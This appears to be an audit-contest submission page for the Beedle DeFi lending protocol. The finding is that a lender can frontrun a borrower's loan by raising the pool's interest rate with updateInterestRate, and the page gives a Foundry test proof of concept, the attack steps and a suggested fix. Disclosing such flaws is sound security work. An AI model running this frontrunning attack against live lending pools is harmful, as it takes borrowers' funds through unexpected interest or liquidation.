Beedle - Oracle free perpetual lending

BeedleFi

DeFiFoundry

20,000 USDC

View results

Previous Next

Submission Details

Severity: medium

Valid

A lender can frontrunn and charge more interest than the prearranged amount

0xl00k

Summary

A malicious lender can create a pool with an interest that can entice any borrower, then can frontrunn and change the interest to the maximum allowed using the updateInterestRate function

Vulnerability Details

function testBorrow() public {

/*------------------- SetPool --------------------------------------------------*/

vm.startPrank(lender1);

Pool memory p = Pool({

lender: lender1,

loanToken: address(loanToken),

collateralToken: address(collateralToken),

minLoanSize: 100*10**18,

poolBalance: 1000*10**18,

maxLoanRatio: 2*10**18,

auctionLength: 1 days,

interestRate: 1000,

outstandingLoans: 0

});

bytes32 poolId = lender.setPool(p);

(,,,,uint256 poolBalance,,,,) = lender.pools(poolId);

assertEq(poolBalance, 1000*10**18);

(,,,,,,,uint interes,) = lender.pools(poolId);

assertEq(interes, 1000);

/* when seeing the borrower's transaction in mempool, it performs frontrunn with the following function: */

lender.updateInterestRate(poolId, 90000);

(,,,,,,,interes,) = lender.pools(poolId);

assertEq(interes, 90000);

/*------------------- Borrow --------------------------------------------------*/

vm.startPrank(borrower);

Borrow memory b = Borrow({

poolId: poolId,

debt: 100*10**18,

collateral: 100*10**18

});

Borrow[] memory borrows = new Borrow[](1);

borrows[0] = b;

lender.borrow(borrows);

assertEq(loanToken.balanceOf(address(borrower)), 995*10**17);

assertEq(collateralToken.balanceOf(address(lender)), 100*10**18);

(,,,,poolBalance,,,,) = lender.pools(poolId);

assertEq(poolBalance, 900*10**18);

1- The lender creates a pool with a low interest

2- A borrower sees this and makes a loan

3- A lender sees a borrower's transaction in mempool and frontrunn to put its updateInterestRate function first

Impact

Mark this problem as high because the borrower after this can: either pay the high interest, or be liquidated and lose their collateral. In either of the two actions the borrower would be suffering a loss of funds

Tools Used

Manual Review

Recommendations

Change the logia of how this works. Consider adding a parameter to the borrow function indicating the maximum interest a borrower is willing to accept.

Prize pool breakdown

Total prize

20,000 USDC

nSLOC

706

28 USDC / LOC

High Medium

18,000 USDC

Low

2,000 USDC

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.